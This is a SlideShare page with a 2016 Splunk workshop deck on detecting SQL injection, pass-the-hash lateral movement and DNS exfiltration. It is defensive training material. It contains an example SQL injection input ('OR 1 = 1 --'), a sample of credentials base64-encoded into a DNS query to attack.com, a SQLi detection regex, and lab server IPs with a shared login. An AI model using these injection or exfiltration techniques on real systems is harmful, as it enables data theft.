Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.
1
https://<yourIP>/ Username: splunklive Password: security
Aquarius – 50.31.150.235 Virgo A-M – 50.31.150.247
Pisces – 50...
Copyright © 2016 Splunk Inc.
Splunk Enterprise for
InfoSec Hands-On
Seattle, May 3, 2016
Cody Harris and Dave Herrald
3
Agenda
Intro
Web Attacks
Lateral Movement
DNS Exfiltration
Wrap-up / Q&A
Copyright © 2016 Splunk Inc.
Intro
Machine data contains a definitive record
of all interactions
Splunk is a very effective platform to collect,
store, and a...
Mainframe
Data
VMware
Platform for Machine Data
Splunk Solutions > Easy to Adopt
Exchange PCISecurity
Relational
Databases...
7
Rapid Ascent in the Gartner SIEM Magic Quadrant*
*Gartner, Inc., SIEM Magic Quadrant 2011-2015. Gartner does not endorse...
8
https://<yourIP>/ Username: splunklive Password: security
Aquarius – 50.31.150.235 Virgo A-M – 50.31.150.247
Pisces – 50...
Copyright © 2016 Splunk Inc.
Web Attacks
10
OWASP 2013 Top 10
[10] Unvalidated redirects and forwards
[9] Using components with known vulnerabilities
[8] Cross-sit...
11
[1] Injection
SQL injection
Code injection
Command injection
LDAP injection
XML injection
XPath injection
SSI injection...
12
Why did I get breached?
SQLi has been around a very, very long time.
13
Imperva Web Application Attacks Report, 2015
14
15
The anatomy of a SQL injection attack
SELECT * FROM users WHERE email='xxx@xxx.com'
OR 1 = 1 -- ' AND password='xxx';
x...
16
TalkTalk: PII/Financial data for 4M customers
vTech: PII for 5M adults+kids
17
…and so far this year…
18
OR
19
You might need help!
Follow along with the
narration in the app, at
least for the first few
examples.
20
Newbie Path
21
Step by Step? Good for later!
22
How step-by-step works
But don’t use it now.
23
You’ve got this! Copy and
paste the example searches
into the “search bar” in the
“SplunkLive Security 2016”
app.
24
Ninja Path
25
Ninja Path
26
What have we here?
Our learning environment consists of:
• 14 Publically-accessible single Splunk
servers
• Each with ~...
Let’s get hands on!
Web Attacks: Basic
28
https://splunkbase.splunk.com/app/1528/
Search for possible SQL injection in your events:
 looks for patterns in URI q...
29
Regular Expression FTW
sqlinjection_rex is a search macro. It contains:
(?<injection>(?i)select.*?from|union.*?select|'...
Let’s get hands on!
Web Attacks: Advanced
31
Bonus: Try out the SQL Injection app!
32
Summary: Web attacks/SQL injection
SQL injection provide attackers with easy access to data
Detecting advanced SQL inje...
Copyright © 2016 Splunk Inc.
Lateral Movement
34
Poking around
An attacker hacks a non-privileged user system.
So what?
Lateral Movement
Lateral Movement is the expansion of
systems controlled, and data accessed.
36
Most famous Lateral Movement attack?
(excluding password re-use)
Pass the Hash!
37
This and other techniques used in destructive Sands breach…
….and at Sony, too.
38
Detecting Legacy PtH
Look for Windows Events:
Event ID: 4624 or 4625
Logon type: 3
Auth package: NTLM
User account is n...
Let’s get hands on!
Lateral Movement: Legacy
40
Then it got harder
• Pass the Hash tools have
improved
• Adjusting of jitter, other
metrics
• So let’s detect lateral
m...
41
Network traffic provides source of truth
I usually talk to 10 hosts
Then one day I talk to 10,000 hosts
ALARM!
Let’s get hands on!
Lateral Movement: Network Traffic
43
iz so hard… u haz magic?
44
iz so hard… u haz magic?
Come see…
detect lateral/PtH at the demo booths.
UBA
45
Summary: Lateral Movement
Attacker success defines scope of a breach
High difficulty, high importance
Worth doing in Sp...
Copyright © 2016 Splunk Inc.
DNS Exfiltration
47
domain=corp;user=dave;password=12345
encrypt
DNS Query:
ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==.attack...
48
DNS exfil tends to be
overlooked within an
ocean of DNS data.
Let’s fix that!
DNS exfiltration
49
FrameworkPOS: a card-stealing program that exfiltrates data from the
target’s network by transmitting it as domain name...
50
https://splunkbase.splunk.com/app/2734/
DNS exfil detection – tricks of the trade
 parse URLs & complicated TLDs (Top ...
51
Examples
• The domain aaaaa.com has a Shannon Entropy score of 1.8 (very low)
• The domain google.com has a Shannon Ent...
52
Detecting Data Exfiltration
index=bro sourcetype=bro_dns
| `ut_parse(query)`
| `ut_shannon(ut_subdomain)`
| eval sublen...
Let’s get hands on!
DNS Exfiltration
54
Detecting Data Exfiltration
… | stats
count
avg(ut_shannon) as avg_sha
avg(sublen) as avg_sublen
stdev(sublen) as stdev...
55
Detecting Data Exfiltration
RESULTS
• Exfiltrating data requires many DNS requests – look for high counts
• DNS exfiltr...
56
Summary: DNS exfiltration
Exfiltration by DNS and ICMP is a very common technique
Many organizations do not analyze DNS...
Copyright © 2016 Splunk Inc.
Wrap-up / Q&A
58
Summary
Multiple phases to modern attacks
Deploy detection across all phases
Also consider adaptive response!
Stay abre...
59
SEPT 26-29, 2016
WALT DISNEY WORLD, ORLANDO
SWAN AND DOLPHIN RESORTS
• 5000+ IT & Business Professionals
• 3 days of te...
THANK YOU
https://splunk.box.com/v/SplunkLive2016SeattleSec
Próxima SlideShare
Cargando en…5
×

Splunk Enterprise for Information Security Hands-On Breakout Session

Splunk Enterprise for Information Security Hands-On Breakout Session

  • Inicia sesión para ver los comentarios

Splunk Enterprise for Information Security Hands-On Breakout Session

  1. 1. 1 https://<yourIP>/ Username: splunklive Password: security Aquarius – 50.31.150.235 Virgo A-M – 50.31.150.247 Pisces – 50.31.150.236 Virgo N-Z – 50.31.150.248 Aries – 50.31.150.237 Libra – 50.31.150.249 Taurus – 50.31.150.238 Scorpio A-M – 50.31.150.250 Gemini – 50.31.150.239 Scorpio N-Z – 50.31.150.251 Cancer – 50.31.150.245 Sagittarius – 50.31.150.252 Leo – 50.31.150.246 Capricorn – 50.31.150.253
  2. 2. Copyright © 2016 Splunk Inc. Splunk Enterprise for InfoSec Hands-On Seattle, May 3, 2016 Cody Harris and Dave Herrald
  3. 3. 3 Agenda Intro Web Attacks Lateral Movement DNS Exfiltration Wrap-up / Q&A
  4. 4. Copyright © 2016 Splunk Inc. Intro
  5. 5. Machine data contains a definitive record of all interactions Splunk is a very effective platform to collect, store, and analyze all of that data Human Machine Machine Machine
  6. 6. Mainframe Data VMware Platform for Machine Data Splunk Solutions > Easy to Adopt Exchange PCISecurity Relational Databases MobileForwarders Syslog / TCP / Other Sensors & Control Systems Across Data Sources, Use Cases & Consumption Models Wire Data IT Svc Int Splunk Premium Solutions & Apps Rich Ecosystem of Apps ITSI UBA UBA
  7. 7. 7 Rapid Ascent in the Gartner SIEM Magic Quadrant* *Gartner, Inc., SIEM Magic Quadrant 2011-2015. Gartner does not endorse any vendor, product or service depicted in its research publication and not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. 2015 Leader and the only vendor to improve its visionary position 2014 Leader 2013 Leader 2012 Challenger 2011 Niche Player 2015
  8. 8. 8 https://<yourIP>/ Username: splunklive Password: security Aquarius – 50.31.150.235 Virgo A-M – 50.31.150.247 Pisces – 50.31.150.236 Virgo N-Z – 50.31.150.248 Aries – 50.31.150.237 Libra – 50.31.150.249 Taurus – 50.31.150.238 Scorpio A-M – 50.31.150.250 Gemini – 50.31.150.239 Scorpio N-Z – 50.31.150.251 Cancer – 50.31.150.245 Sagittarius – 50.31.150.252 Leo – 50.31.150.246 Capricorn – 50.31.150.253
  9. 9. Copyright © 2016 Splunk Inc. Web Attacks
  10. 10. 10 OWASP 2013 Top 10 [10] Unvalidated redirects and forwards [9] Using components with known vulnerabilities [8] Cross-site request forgery [7] Missing function level access control [6] Sensitive data exposure [5] Security misconfiguration [4] Insecure direct object reference [3] Cross-site scripting (XSS) [2] Broken authentication and session management
  11. 11. 11 [1] Injection SQL injection Code injection Command injection LDAP injection XML injection XPath injection SSI injection IMAP/SMTP injection Buffer overflow
  12. 12. 12 Why did I get breached? SQLi has been around a very, very long time.
  13. 13. 13 Imperva Web Application Attacks Report, 2015
  14. 14. 14
  15. 15. 15 The anatomy of a SQL injection attack SELECT * FROM users WHERE email='xxx@xxx.com' OR 1 = 1 -- ' AND password='xxx'; xxx@xxx.xxx' OR 1 = 1 -- ' xxx admin@admin.sys 1234 An attacker might supply:
  16. 16. 16 TalkTalk: PII/Financial data for 4M customers vTech: PII for 5M adults+kids
  17. 17. 17 …and so far this year…
  18. 18. 18 OR
  19. 19. 19 You might need help! Follow along with the narration in the app, at least for the first few examples.
  20. 20. 20 Newbie Path
  21. 21. 21 Step by Step? Good for later!
  22. 22. 22 How step-by-step works But don’t use it now.
  23. 23. 23 You’ve got this! Copy and paste the example searches into the “search bar” in the “SplunkLive Security 2016” app.
  24. 24. 24 Ninja Path
  25. 25. 25 Ninja Path
  26. 26. 26 What have we here? Our learning environment consists of: • 14 Publically-accessible single Splunk servers • Each with ~5.5M events, from real environments but massaged: • Windows Security events • Apache web access logs • Bro DNS & HTTP • Palo Alto traffic logs • Some other various bits
  27. 27. Let’s get hands on! Web Attacks: Basic
  28. 28. 28 https://splunkbase.splunk.com/app/1528/ Search for possible SQL injection in your events:  looks for patterns in URI query field to see if anyone has injected them with SQL statements  use standard deviations that are 2.5 times greater than the average length of your URI query field Macros used • sqlinjection_pattern(sourcetype, uri query field) • sqlinjection_stats(sourcetype, uri query field)
  29. 29. 29 Regular Expression FTW sqlinjection_rex is a search macro. It contains: (?<injection>(?i)select.*?from|union.*?select|'$|delete.*?from|update.*?set|alter.*?table|([ %27|'](%20)*=(%20)*[%27|'])|w*[%27|']or) Which means: In the string we are given, look for ANY of the following matches and put that into the “injection” field. • Anything containing SELECT followed by FROM • Anything containing UNION followed by SELECT • Anything with a ‘ at the end • Anything containing DELETE followed by FROM • Anything containing UPDATE followed by SET • Anything containing ALTER followed by TABLE • A %27 OR a ‘ and then a %20 and any amount of characters then a %20 and then a %27 OR a ‘ • Note: %27 is encoded “’” and %20 is encoded <space> • Any amount of word characters followed by a %27 OR a ‘ and then “or”
  30. 30. Let’s get hands on! Web Attacks: Advanced
  31. 31. 31 Bonus: Try out the SQL Injection app!
  32. 32. 32 Summary: Web attacks/SQL injection SQL injection provide attackers with easy access to data Detecting advanced SQL injection is hard – use an app! Understand where SQLi is happening on your network and put a stop to it. Augment your WAF with enterprise-wide Splunk searches.
  33. 33. Copyright © 2016 Splunk Inc. Lateral Movement
  34. 34. 34 Poking around An attacker hacks a non-privileged user system. So what?
  35. 35. Lateral Movement Lateral Movement is the expansion of systems controlled, and data accessed.
  36. 36. 36 Most famous Lateral Movement attack? (excluding password re-use) Pass the Hash!
  37. 37. 37 This and other techniques used in destructive Sands breach… ….and at Sony, too.
  38. 38. 38 Detecting Legacy PtH Look for Windows Events: Event ID: 4624 or 4625 Logon type: 3 Auth package: NTLM User account is not a domain logon, or Anonymous Logon …this is trivially easy in Splunk.
  39. 39. Let’s get hands on! Lateral Movement: Legacy
  40. 40. 40 Then it got harder • Pass the Hash tools have improved • Adjusting of jitter, other metrics • So let’s detect lateral movement differently – just looking at Windows event codes isn’t enough.
  41. 41. 41 Network traffic provides source of truth I usually talk to 10 hosts Then one day I talk to 10,000 hosts ALARM!
  42. 42. Let’s get hands on! Lateral Movement: Network Traffic
  43. 43. 43 iz so hard… u haz magic?
  44. 44. 44 iz so hard… u haz magic? Come see… detect lateral/PtH at the demo booths. UBA
  45. 45. 45 Summary: Lateral Movement Attacker success defines scope of a breach High difficulty, high importance Worth doing in Splunk Easy with UBA
  46. 46. Copyright © 2016 Splunk Inc. DNS Exfiltration
  47. 47. 47 domain=corp;user=dave;password=12345 encrypt DNS Query: ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==.attack.com ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==
  48. 48. 48 DNS exfil tends to be overlooked within an ocean of DNS data. Let’s fix that! DNS exfiltration
  49. 49. 49 FrameworkPOS: a card-stealing program that exfiltrates data from the target’s network by transmitting it as domain name system (DNS) traffic But the big difference is the way how stolen data is exfiltrated: the malware used DNS requests! https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos- variant-exfiltrates-data-via-dns-requests “ ” … few organizations actually keep detailed logs or records of the DNS traffic traversing their networks — making it an ideal way to siphon data from a hacked network. http://krebsonsecurity.com/2015/05/deconstructing-the-2014-sally- beauty-breach/#more-30872 “ ” DNS exfiltration
  50. 50. 50 https://splunkbase.splunk.com/app/2734/ DNS exfil detection – tricks of the trade  parse URLs & complicated TLDs (Top Level Domain)  calculate Shannon Entropy List of provided lookups • ut_parse_simple(url) • ut_parse(url, list) or ut_parse_extended(url, list) • ut_shannon(word) • ut_countset(word, set) • ut_suites(word, sets) • ut_meaning(word) • ut_bayesian(word) • ut_levenshtein(word1, word2)
  51. 51. 51 Examples • The domain aaaaa.com has a Shannon Entropy score of 1.8 (very low) • The domain google.com has a Shannon Entropy score of 2.6 (rather low) • A00wlkj—(-a.aslkn-C.a.2.sk.esasdfasf1111)-890209uC.4.com has a Shannon Entropy score of 3 (rather high) Layman’s definition: a score reflecting the randomness or measure of uncertainty of a string Shannon Entropy
  52. 52. 52 Detecting Data Exfiltration index=bro sourcetype=bro_dns | `ut_parse(query)` | `ut_shannon(ut_subdomain)` | eval sublen = length(ut_subdomain) | table ut_domain ut_subdomain ut_shannon sublen TIPS  Leverage our Bro DNS data  Calculate Shannon Entropy scores  Calculate subdomain length  Display Details
  53. 53. Let’s get hands on! DNS Exfiltration
  54. 54. 54 Detecting Data Exfiltration … | stats count avg(ut_shannon) as avg_sha avg(sublen) as avg_sublen stdev(sublen) as stdev_sublen by ut_domain | search avg_sha>3 avg_sublen>20 stdev_sublen<2 TIPS  Leverage our Bro DNS data  Calculate Shannon Entropy scores  Calculate subdomain length  Display count, scores, lengths, deviations
  55. 55. 55 Detecting Data Exfiltration RESULTS • Exfiltrating data requires many DNS requests – look for high counts • DNS exfiltration to mooo.com and chickenkiller.com
  56. 56. 56 Summary: DNS exfiltration Exfiltration by DNS and ICMP is a very common technique Many organizations do not analyze DNS activity – do not be like them! No DNS logs? No Splunk Stream? Look at FW byte counts
  57. 57. Copyright © 2016 Splunk Inc. Wrap-up / Q&A
  58. 58. 58 Summary Multiple phases to modern attacks Deploy detection across all phases Also consider adaptive response! Stay abreast of modern advancements App Export: https://splunk.box.com/v/SplunkLive2016SeattleSec
  59. 59. 59 SEPT 26-29, 2016 WALT DISNEY WORLD, ORLANDO SWAN AND DOLPHIN RESORTS • 5000+ IT & Business Professionals • 3 days of technical content • 165+ sessions • 80+ Customer Speakers • 35+ Apps in Splunk Apps Showcase • 75+ Technology Partners • 1:1 networking: Ask The Experts and Security Experts, Birds of a Feather and Chalk Talks • NEW hands-on labs! • Expanded show floor, Dashboards Control Room & Clinic, and MORE! The 7th Annual Splunk Worldwide Users’ Conference PLUS Splunk University • Three days: Sept 24-26, 2016 • Get Splunk Certified for FREE! • Get CPE credits for CISSP, CAP, SSCP • Save thousands on Splunk education!
  60. 60. THANK YOU https://splunk.box.com/v/SplunkLive2016SeattleSec

×